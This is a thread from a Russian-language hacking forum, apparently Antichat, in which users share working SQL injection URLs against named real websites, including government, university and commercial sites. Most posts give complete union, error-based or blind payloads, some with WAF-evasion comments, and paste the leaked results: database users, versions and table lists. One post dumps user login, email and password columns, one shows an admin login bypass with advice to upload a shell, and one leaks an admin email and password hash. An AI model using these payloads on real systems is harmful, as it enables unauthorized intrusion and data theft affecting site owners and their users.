ANTICHAT Forum

SQL Injections (https://forum.antichat.xyz/showthread.php?t=424558)

faza02 27.04.2015 20:15

Post the SQL injections you find here. Before posting, check whether the SQLi has already been published:

Code:
Google: site:forum.antichat.ru [your site with SQLi]

Previous thread: /threads/21336/

ATTENTION!!! Wrap all injections in the [ CODE ] [ / CODE ] tag; there must be no [ URL ] [ / URL ] tags.

Rules of this thread:
  1. Injections of the form:

    Code:
    http://site.ru/index.php?a='

    will be deleted. It is also advisable to state the DB version in the post.

  2. Publishing passwords and hashes for admin panels in this thread is forbidden. They will be deleted, and violators will be punished.
  3. Flame/off-topic is deleted and harshly punished.

kingbeef 29.04.2015 13:51

SQLi with output in the address bar

Code:
http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--+k

5.5.36-34.0-632.precise

gromoza 30.04.2015 09:54

Code:
http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html

(1062) Duplicate entry 'macnew@127.0.0.11' for key 'group_key'

MaxFast 30.04.2015 10:21

Code:
http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10,11,12,13,14--

ecomobil@localhost:ecomobil

teh 03.05.2015 23:47

Code:
http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15--

crona_site 5.5.25 db_crona@localhost

teh 07.05.2015 22:40

Code:
http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2,3,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info

znvc@localhost

5.1.73

CPOSI


Code:
http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=



ruboohran_riba@192.168.1.28

5.5.27-log

ruboohran_riba


reuvenmatbil 09.05.2015 11:08

Code:
http://www.satena.com/about-us/board-of-directors/(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(75),CHAR(80),CHAR(112),CHAR(53),CHAR(111),CHAR(89),CHAR(89),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))


MaxFast 10.05.2015 19:29

Code:
http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2

Be careful, MySQL 4

fakecoder 14.05.2015 02:28

Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+

in TITLE

8k hosts/day

for anyone interested in fighting a WAF... although faza has already taken it down...

Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1

CY 250, PR 4

faza02 14.05.2015 02:55

Quote:

fakecoder said:

for anyone interested in fighting a WAF

Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1

CY 250, PR 4

better to merge the posts

Code:
http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+

5.0.77-log

EoGeneo 15.05.2015 08:47

Quote:

fakecoder said:

Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+

in TITLE
8k hosts/day

nothing interesting

Database:

invest-expert

Tables:

table_article

table_banner

table_coment

table_fotos

table_kategorie

table_menue

table_news

table_produkt

table_projects

table_projects_archive

table_text_blocks

table_texte

table_video

Br@!ns 21.05.2015 13:42

Code:
http://frameworksgallery.com/admin/checkuser.php
POST
member_name=k&password=kkkkkk' or 1=1 -- &Submit=Submit

upload the shell as phtml, just in case

Mister_Bert0ni 21.05.2015 19:21

Code:
http://www.lampbulbs.co.uk/product.php
?prodid=162' +UNION(/**_**/SELECT(1),(2),(concat/**_**/((0x3c62723e),(0x7e7e4d69737465725f42657274306e697e7e),(
0x3c62723e),(version/**_**/()),(0x3c62723e),(user/**_**/()),(0x3c62723e),(database/**_**/()))),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42))--+


karter_kg 21.05.2015 23:24

HTML:
http://www.ghanaweb.com/GhanaHomePage/soccer.PredictionLeague/index.php?cmd=showmonthlywinners&month=24121'+and+1=0+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,user(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--+

user() =rijk5_w@209.68.59.161

@@version = 5.1.67-log

Alexa = 2,645

karter_kg 23.05.2015 16:42

Code:
http://www.uvm.edu/crs/sdc/county_result.php?co_id=4'+and+extractvalue(1,concat(0x3a,(user())))+--+

user()=rural_admin@tubeweb1.uvm.edu

version() =5.5.43-37.2-log

Alexa = 15,582

Code:
http://depts.washington.edu/neurolog/psych/archives/viewPres.php?id=708'and+extractvalue(1,concat(0x3a,(user())))+--+

user() = root@depts12.u.washington.edu

version() = 5.5.18

R3hab 29.05.2015 14:25

http://www.sangean.com/image/LOGO/SANGEAN_LOGO_RED.gif

Quote:

Posted by None
sangean.com/products/product.asp?mid=40%20or%201=@@version

TIC20 PR4 AR460,627

DezMond™ 02.06.2015 10:27

PR7

Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,version(),9,10,11,12+--+

Drupal

Code:
https://www.stevens.edu/provost/CHANGELOG.txt

how do I find out the DB prefix?

psihoz26 02.06.2015 14:49

there is no prefix, though

Code:
http://www.stevens.edu/provost/oie/view-patent?id=-20100137884+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12+from+information_schema.tables+where+table_schema=database()+--+


Br@!ns 03.06.2015 17:11

Code:
http://www.winelabelworld.com/list.php?c=18&w=8+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSION(),+1,+63),+FLOOR(RAND(0)*2)))+--+

Query failed: Duplicate entry '5.0.951' for key 1

The site localwineevents.com has the database "lwe", which sits alongside / alexa 163,137

Insaider 05.06.2015 00:14

Code:
http://education.zyxel.com/ZCNE_Course_Event.asp?cert_id=1' or 1=@@version--

Windows version: 2003

SQL Server version: 2005

Database name: education_3

System user: cso_user

Server name: CSO-ELDB

psihoz26 08.06.2015 15:02

Squeezing the "maximum" out of error-based )) from a potential vulnerability to the start of the dump in ~5 requests))

Code:
URL: http://2c5whdbcb6m2c2xx.onion/search/1%27%29%09and%09%28%28SELECT%09%28i%09IS%09NOT%09NULL%29%09-%09-9223372036854775808%09FROM%09%28SELECT%09%28concat%28version%28%29%29%29i%29a%29%29=2--%09

version() = 5.5.43-0+deb7u1

Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,1,400),0x7d7d7d))i)a)&url=%2Fproducts%2F7

Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,300,700),0x7d7d7d))i)a)&url=%2Fproducts%2F7

Result (table names in hoursppc_biznewenc):


Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' and @:=CONCAT(@,0x2C,CONCAT(column_name))),@),5)),0x7d7d7d))i)a)&url=%2Fproducts%2F7

Result (column names in hoursppc_biznewenc.users):


Code:
URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
POST DATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(select length(MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM users WHERE @:=CONCAT(@,0x2C,CONCAT(login,0x3b,email,0x3b,password))),@),5))),0x3a,(SELECT mid(@,1,400)),0x7d7d7d))i)a)&url=%2Fproducts%2F7

Result (fragment of select concat(login,0x3b,email,0x3b,password) from hoursppc_biznewenc.users):



Br@!ns 09.06.2015 23:15

Code:
http://forums.sbo.sailboatowners.com/q_login.php?do=login

POST

redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Find ex.php%3Foption%3Dcom_content%26task%3Dview%26id%3 D30%26Itemid%3D64&vb_login_username=asfasf'or(Extr actValue(1,concat(0x3a,(select+user()))))='1&vb_lo gin_password=asfasf&cookieuser=1&image.x=0&image.y =0&s=&do=login&vb_login_md5password=0a040ec34abbfb 7f3030345244a913c9&vb_login_md5password_utf=0a040e c34abbfb7f3030345244a913c9

vB integrated into Joomla; admin panels and the like are hidden everywhere, but everything can be found and uploaded. Maybe someone will be interested in trying

huntercs16 09.06.2015 23:41

Code:
https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a)+)+--+;

WP is installed

nikonic 11.06.2015 20:33

KAMCHATKA SCIENTIFIC CENTER

Code:
http://www.kscnet.ru/ivs/kvert/volc.php?lang=en&name=99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19,20+--+

TIC 750 PR 5

5.5.30-log

3nvY 15.06.2015 23:45

SQLi:

Code:
http://boroughs.org/subpage.php?link=Borough-News-Magazine'+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3b3c62723e,database(),user(),version(),@@version_compile_os),7,8,9,10,11+--+


Unknowhacker 17.06.2015 15:00

http://sanpid.com/images/logo_vs.png

Code:
http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+

Version: 5.0.96-community-log

3nvY 18.06.2015 07:09

SQLi:

Code:
http://www.rnd.goa.gov.in/content_news_disp.php?id=-14+union+select+1,2,3,4,CONCAT_WS%280x3b3c62723e,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,6,7,8,9,10,11+--+

rnd@localhost; 5.6.22; rnd

grimnir 19.06.2015 11:02

Code:
http://pr.alexa.cn/index.php?url=1' OR EXTRACTVALUE(8396,CONCAT(0x5c,0x716a787171,(SELECT (ELT(8396=8396,1))),0x7171787671)) AND 'BvUT'='BvUT

alexa.cn traffic 590k

error-based

hostname: 'AY12063001214105c7538'

'root'@'127.0.0.1'

Nginx, PHP 5.4.37, MySQL >= 5.0.0

BD list:

alexa


icpdb

information_schema

mysql

performance_schema

test

tour2013

whoisdb

xj_cn_2014

grimnir 22.06.2015 10:32

Code:
http://leton.tv/player.php?streampage=tnj1bde' AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x716a717671,(SELECT (ELT(4549=4549,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Iimq'='Iimq&width=600&height=450

leton.tv traffic 1.6kk, streaming video service

error based

PHP 5.3.3, Nginx, MySQL >= 5.0.0

DBA: True


hostname: 'hostname.change.me'

''@'hostname.change.me'

''@'localhost'

'root'@'127.0.0.1'

'root'@'hostname.change.me'

'root'@'localhost'

DB list:

information_schema

megom

mysql

scorenews

test

wowza

wowza2

wowza2_b1

grimnir 25.06.2015 11:40

cashbackmonitor.com traffic 430k, shop comparison

Code:
Parameter: #1* (URI)
  AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND 2703=2703 AND 'nUyh'='nUyh

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND (SELECT 2579 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(2579=2579,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlmZ'='hlmZ

    Title: Generic UNION query (NULL) - 22 columns
    Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4647646f4f536d657563,0x7178787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--



web server operating system: Linux Red Hat Enterprise 6 (Santiago)

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL >= 5.0.0

available databases [3]:

[*] CashbackMonitor

[*] information_schema

[*] test

-------------------------------------------------------------

sydney.edu.au traffic 2.2kk

Code:
Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://sydney.edu.au:80/medicine/public-health/research/publications.php?year=2010' AND (SELECT 5421 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (ELT(5421=5421,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sBCP'='sBCP



web server operating system: Linux Red Hat Enterprise 5 (Tikanga)

web application technology: Apache 2.2.3, PHP 5.1.6

back-end DBMS: MySQL >= 5.0.0

available databases [266]:



grimnir 05.07.2015 18:56

Code:
https://www.tcd.ie/irishfilm/print.php?search=keyword&q=radharc&exactMatch=&extraSearch=-8628 OR 1 GROUP BY CONCAT(0x716b716271,(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END)),0x7170787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#

tcd.ie traffic 1.2kk, a college in Ireland

error based

Apache 2.4.10;MySQL >= 5.0.0

Database: filmresearch_db

[6 tables]
+-----------------+
| bibliography    |
| biography       |
| censor_appeal   |
| censor_decision |
| censor_film     |
| film            |
+-----------------+

Code:
http://bgequipment.powweb.com:80/service_detail.php?ID=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1856=1856,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GkPg'='GkPg

powweb.com traffic varies

error based

PHP 5.3.29, Apache 2;MySQL >= 5.0.0

available databases [2]:
[*] bges
[*] information_schema

3nvY 05.07.2015 19:56

Code:
http://rid.waipadc.govt.nz/cemetery/cemetery_record_view.php?id=-2774+union+select+1,concat_ws%280x3c62723e,version%28%29,database%28%29,user%28%29%29,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+

cemetery@aoraki.webbase.net.nz;

5.0.51a-24+lenny5-log;

cemetery

BigBear 06.07.2015 17:56

Code:
http://www.polarview.aq/old/tablelisting_SAR.php?hemi=S&time=Last+week&area=NewZealand'+and+ascii(substr(version(),6,1))>'113'+and+concat(1,1,1)='111

Nothing interesting, just an "ordinary" PostgreSQL injection on one of Antarctica's sites. Move along.

ocheretko 10.07.2015 07:02

ASP, MS-SQL

Attack type: Convert INT ODBC Error

Code:
Version - http://nchla.org/issues.asp?ID=1+and+1=convert(int,@@version)--

Code:
User http://nchla.org/issues.asp?ID=1+and+1=convert(int,user_name())--

Code:
Database http://nchla.org/issues.asp?ID=1+and+1=convert(int,db_name())--

Code:
Enumerating database names
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(0))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(1))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(2))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(3))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(4))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(5))--

And the dump

http://i11.pixs.ru/storage/7/3/4/dum...1_17973734.png

DezMond™ 10.07.2015 15:51

PR7

Code:
http://www7.inra.fr/drh/cr2013/listeparconcours-cr2.php?choix=8&langue=FR+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+


Mister_Bert0ni 16.07.2015 15:28

Code:
http://www.compactkitchens.in/productdetail.php?cat_id=.37' and @pipka:=(
(SELECT+GROUP_CONCAT(/*!12345table_name*/,0x2020203a3a3a2020,/*!12345column_name*/+SEPARATOR+0x3c62723e)+FROM+
/*!50000INFORMATION_SCHEMA.columns*/+WHERE+TABLE_SCHEMA=DATABASE/**/()))/*!50000UNIOn*/ SELECT 1,2,3,4,5,6,
concat/**/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE/**/(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version/**/(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,@pipka),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -

Code:
http://www.ilovemusica.com/shop.php?cat=.6 UNION SELECT concat(0x3c2f7469746c653e,0x3c63656e7465723e,
0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x3c212d2d),null -- -


kingbeef 19.07.2015 01:44

More...

Output in an alert

Code:
http://www.agriagency.com.ua/comments/10227.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1


KIR@PRO 23.07.2015 17:16

ATTENTION!!! Wrap all injections in the [ CODE ] [ / CODE ] tag; there must be no [ URL ] [ / URL ] tags.

Post POST injections in [ CODE ] [ /CODE ] as well

Code:
http://site.zone/index.php?cmd=viewpost
POST:
id=-1'+and+1=2+union+select+1,2,3,4,5,version(),7,8+--+

Text in [ URL ] [ /URL ] gets truncated by length and becomes inconvenient to read, unlike [ CODE ] [ /CODE ]

spherics 28.07.2015 15:34

Code:
http://www.tv3.ie/news_sub_page.php?locID=1.2.888000+union+select+concat_ws(0x3a3a,version(),user(),database())--

Version: 5.0.95-log

user : tv3_readonly@localhost

database: tv3

goot 30.07.2015 09:11

Hi everyone!

There is a hole and it gives up the database, but it's Joomla 3.3.1 and it spits out a salted hash

And the filter doesn't let the admin login through(((

Code:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'

Brute force alone is pointless there, you have to inject right away

I downloaded the database using the Havij v1.16 software

Code:
Target:        http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP:        91.236.136.194
Web Server:    nginx
DB Server:    MySQL error based
Resp. Time(avg):    85 ms
Sql Version:    5.5.43-0+deb7u1-log
Compile OS:    debian-linux-gnu
Host Name:    ura.webhost1.ru
Current DB:    sergei62_og
Installation dir:    /usr

admin data

povar.admin@gmail.com

$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO

Couldn't upload(( didn't find the path

Whoever manages to dig it out, write me a PM (How did you do it?)

P.S. the server filters on the number of requests per minute! So don't rush)))

